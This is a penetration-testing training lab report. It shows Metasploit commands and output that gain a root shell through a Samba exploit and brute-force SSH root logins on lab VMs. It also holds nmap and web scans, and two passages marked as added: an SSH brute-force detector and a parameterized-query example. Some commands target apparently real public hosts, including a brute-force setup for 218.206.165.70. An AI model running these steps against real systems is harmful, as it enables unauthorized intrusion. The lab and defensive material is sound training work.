Penetration Testing Lab Report (China Mobile Security Department)

Updated: 2023-11-27 01:57:02


Penetration Testing Training, March 13

Day 1: Summary of the Main Experiments

First, the Struts2 vulnerability was used to execute arbitrary commands directly and take control of the host.

Lab environment:

Kali Linux as the attack machine; OWASP as the target machine.

2003 and Metasploitable: successfully reachable.

Use Metasploit to attack the target's Samba service and obtain a shell:

search samba   (find the module)
use multi/samba/usermap_script   (select the exploit module)
show payloads   (list the payloads compatible with this exploit module)
set payload cmd/unix/bind_netcat   (use netcat to run the shell once the exploit succeeds)
show options   (list the parameters that need to be set)
set RHOST 10.10.10.254   (set the target host)
exploit   (launch the attack)

1. First install the VM software, start Kali, OWASP and Metasploitable, and set up the environment so that the network is reachable; use NAT mode for the network, with the address range 10.10.10.0/24.

2. Start the Kali VM and switch to root. First enter msfconsole and change the initial password to 123456:

msf > passwd
[*] exec: passwd

输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码

Then search for the Samba modules:

msf > search samba

Matching Modules
================

Name  Disclosure Date  Rank  Description
----  ---------------  ----  -----------

auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal

auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow

auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow

auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow

exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)

exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)

exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow

exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow

exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)

exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

exploit/multi/samba/usermap_script 2007-05-14 excellent Samba \

exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)

exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)

exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution

exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution

exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow

exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow

post/linux/gather/enum_configs normal Linux Gather Configurations

msf > use multi/samba/usermap_script   (select the exploit module)

msf exploit(usermap_script) > show payloads   (list the payloads compatible with this exploit module)

Compatible Payloads
===================

Name  Disclosure Date  Rank  Description
----  ---------------  ----  -----------
cmd/unix/bind_awk  normal  Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_inetd  normal  Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_lua  normal  Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat  normal  Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping  normal  Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6  normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl  normal  Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6  normal  Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby  normal  Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6  normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_zsh  normal  Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic  normal  Unix Command, Generic Command Execution
cmd/unix/reverse  normal  Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk  normal  Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_lua  normal  Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_netcat  normal  Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping  normal  Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl  normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl  normal  Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl  normal  Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl  normal  Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python  normal  Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl  normal  Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_ruby  normal  Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl  normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet  normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh  normal  Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat   (use netcat to run the shell once the exploit succeeds)
payload => cmd/unix/bind_netcat

msf exploit(usermap_script) > show options   (list the parameters that need to be set)

msf exploit(usermap_script) > set RHOST 10.10.10.254   (set the target host)
RHOST => 10.10.10.254

msf exploit(usermap_script) > exploit   (launch the attack)

[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800

Control of the 10.10.10.254 machine has been obtained, so a user can be added: useradd test (user added successfully).

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Host discovery: -PU -sn does a UDP ping without listing services; -Pn skips the ping.

nmap -sS -Pn xx.xx.xx.xx   (TCP SYN scan; no ICMP is sent)
nmap -sV -Pn xx.xx.xx.xx   (list service details)
nmap -PO -script=smb-check-vulns xx.xx.xx.xx   (check for the MS08-067 vulnerability)

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

nmap site scan

msf > nmap

msf > nmap -sV -Pn 10.10.10.254
[*] exec: nmap -sV -Pn 10.10.10.254

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:38 CST
Nmap scan report for 10.10.10.254
Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

msf > nmap -PO -script=smb-check-vulns 10.10.10.254
[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:47 CST
Nmap scan report for 10.10.10.254
Host is up (0.00021s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

msf > nmap -O www.ctsi.com.cn
[*] exec: nmap -O www.ctsi.com.cn

Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 17:16 CST
Nmap scan report for www.ctsi.com.cn (211.100.35.132)
Host is up (0.0054s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set THREADS 50
THREADS => 50

msf auxiliary(dir_scanner) > set RHOSTS www.http://m.wodefanwen.com/

set THREADS 50 run

2. nmap

Service scanning and enumeration

1. Metasploit's scanner auxiliary modules include many tools for service scanning and enumeration; they are usually named [service name]_login. Search with: search name:version

2. SSH enumeration

use auxiliary/scanner/ssh/ssh_version
set RHOSTS xxxx
set THREADS 100
run

&&&&&&&&&&&&&&&&&&&&&&&&

SSH enumeration experiment:

root@kali:~# msfconsole

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    22               yes       The target port
THREADS  1                yes       The number of concurrent threads
TIMEOUT  30               yes       Timeout for the SSH probe

msf auxiliary(ssh_version) > set RHOSTS 10.10.10.129
RHOSTS => 10.10.10.129
msf auxiliary(ssh_version) > set THREADS 100
THREADS => 100
msf auxiliary(ssh_version) > run

[*] 10.10.10.129:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Password guessing

The address can be an address range, a single IP or an address block; USER and the other options are set inside msfconsole:

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 218.206.165.70
set USERNAME root
set PASS_FILE /aaa
set THREADS 100
run

Create a password file with vi.

Password sniffing

use auxiliary/sniffer/psnuffle

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Password guessing experiment:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   false            no        Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
DB_ALL_PASS       false            no        Add all passwords in the current database to the list
DB_ALL_USERS      false            no        Add all users in the current database to the list
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             22               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS      false            no        Try the username as the password for all users
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/passwd   // a password file named passwd was created in root's home directory
PASS_FILE => /root/passwd
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > set RHOSTS 10.10.10.129
RHOSTS => 10.10.10.129
msf auxiliary(ssh_login) > run

[*] 10.10.10.129:22 SSH - Starting bruteforce
[*] 10.10.10.129:22 SSH - [1/3] - Trying: username: 'root' with password: 'ahbieid'
[-] 10.10.10.129:22 SSH - [1/3] - Failed: 'root':'ahbieid'
[*] 10.10.10.129:22 SSH - [2/3] - Trying: username: 'root' with password: 'xideoejd'
[-] 10.10.10.129:22 SSH - [2/3] - Failed: 'root':'xideoejd'
[*] 10.10.10.129:22 SSH - [3/3] - Trying: username: 'root' with password: 'owaspbwa'
[*] Command shell session 1 opened (10.10.10.128:40157 -> 10.10.10.129:22) at 2015-03-14 13:51:30 +0800
[+] 10.10.10.129:22 SSH - [3/3] - Success: 'root':'owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Password guessing succeeded.
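Seen from the target's side, the ssh_login run above leaves a trail in the sshd log: repeated failures from 10.10.10.128 followed by an accepted root login a second later. The following detector is an added example and not part of the original report; the auth.log lines are constructed to mirror the run, and the thresholds max_failures and window_s are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (auth.log style) modelling the run above:
# 10.10.10.128 (Kali) guessing root's password on 10.10.10.129 (owaspbwa),
# followed by an unrelated key-based login from another host.
SAMPLE_AUTH_LOG = """\
Mar 14 13:51:28 owaspbwa sshd[2301]: Failed password for root from 10.10.10.128 port 40155 ssh2
Mar 14 13:51:29 owaspbwa sshd[2303]: Failed password for root from 10.10.10.128 port 40156 ssh2
Mar 14 13:51:30 owaspbwa sshd[2305]: Accepted password for root from 10.10.10.128 port 40157 ssh2
Mar 14 13:55:02 owaspbwa sshd[2340]: Accepted publickey for admin from 10.10.10.1 port 51022 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)


def parse_auth_log(text, year=2015):
    """Return (timestamp, result, user, src) for each sshd authentication line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # skip lines that are not authentication results
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, max_failures=2, window_s=60):
    """Alert once a source reaches max_failures within window_s seconds, and
    escalate when an Accepted login follows failures still inside the window."""
    recent_failures = defaultdict(list)  # src -> timestamps of recent failures
    alerts = []
    for ts, result, user, src in events:
        window = [t for t in recent_failures[src] if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            window.append(ts)
            if len(window) >= max_failures:
                alerts.append(("bruteforce", src, user, len(window)))
        elif window:  # success right after a burst: likely a guessed password
            alerts.append(("success_after_failures", src, user, len(window)))
        recent_failures[src] = window
    return alerts
```

The key-based admin login from 10.10.10.1 produces no alert because no failures precede it; only the guessing source is reported.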

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Host discovery experiment:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
RHOSTS                      yes       The target address range or CIDR identifier
SHOST                       no        Source IP Address
SMAC                        no        Source MAC Address
THREADS    1                yes       The number of concurrent threads
TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24
RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50
THREADS => 50
msf auxiliary(arp_sweep) > run

[*] 10.10.10.1 appears to be up (VMware, Inc.).
[*] 10.10.10.2 appears to be up (VMware, Inc.).
[*] 10.10.10.129 appears to be up (VMware, Inc.).
[*] 10.10.10.130 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Network scanning: OpenVAS etc.

Web scanning

1. Under modules/auxiliary, wmap:

load wmap   (initialise wmap)
wmap_sites -a http://XXX   (add a site to scan with wmap)
wmap_sites -l
wmap_targets -t http://XXXX
wmap_run -t   (once run, wmap calls the configured auxiliary modules to scan the target; then check the results)
wmap_run -e vulns ??

www.exploit-db.com
www.netasploit.com/modules
packetstormsecurity.org

cd /usr/share/w3af/

A very practical scanning tool is W3af: w3af_console

plugins
audit xss (cross-site scripting) sql (SQL injection)
back
plugins
output html_file, console
output config html_file
set output_file 123.html
set verbose True
back
back
plugins
crawl web_spider
crawl config web_spider
set only_forward True
set follow_regex .*
set ignore_regex
back
back
target
set target http://www.dvssc.com/mutillidae/
back

SQL injection key points:

parameterized queries
filtering (whitelist)
encoding (used to bypass anti-injection measures and filters); MySQL wide bytes
second-order input (treat all input as hostile)
error handling (inputs that trigger errors)
least privilege (currently very many applications run as root; see WooYun)
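The parameterized-query and whitelist points above, as an added example that is not part of the original report: a constructed in-memory sqlite3 table stands in for the login form's backend, with the string-concatenated query beside its parameterized replacement, plus a whitelist check for an ORDER BY column, which cannot be bound as a parameter.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    db.commit()
    return db


def login_vulnerable(db, name, password):
    """Concatenation: the user's input becomes part of the SQL text, so a quote
    in the password changes the WHERE clause instead of being compared as data."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, name, password):
    """Parameterized query: the driver binds the values, never parses them as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone() is not None


ALLOWED_SORT_COLUMNS = {"name"}  # identifiers cannot be bound, so whitelist them


def list_users(db, sort_by="name"):
    """Whitelist filtering for the one place a parameter cannot be used."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return [row[0] for row in db.execute(f"SELECT name FROM users ORDER BY {sort_by}")]
```

With a password containing a closing quote and an OR condition, login_vulnerable returns True without the real password while login_parameterized returns False; list_users rejects anything that is not an allowed column name.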

http://218.206.165.70:8972/qhwxcs-djy/login.jsp   (once the username and password are found, you can log in)

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Scanning experiment:

root@kali:~# cd /usr/share/w3af/
root@kali:/usr/share/w3af# w3af_console
w3af>>> plugins
